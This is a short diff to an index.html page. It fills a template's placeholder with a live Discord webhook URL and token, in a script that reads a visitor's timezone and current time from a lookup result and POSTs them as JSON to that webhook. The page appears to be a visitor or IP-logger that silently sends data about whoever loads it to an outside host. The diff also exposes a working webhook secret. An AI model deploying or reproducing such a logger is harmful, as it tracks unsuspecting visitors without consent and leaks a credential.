--- a/index.html
+++ b/index.html
@@ -24,7 +24,7 @@
         const tz = data.timezone.name;
         const ct = data.timezone.current_time;
         const request = new XMLHttpRequest();
-        request.open("POST", "PLACE_WEBHOOK_URL_HERE");
+        request.open("POST", "https://discord.com/api/webhooks/1046953215096258722/LkE3cBAmMHLQ0hl8ADTRtQeVx9DXjAgqQce92eSVyArdK1yISme-3rndQDNheLcITBa9");
         // Put in your discord webhook url above ^^^
         request.setRequestHeader("Content-type", "application/json");
         const params = {
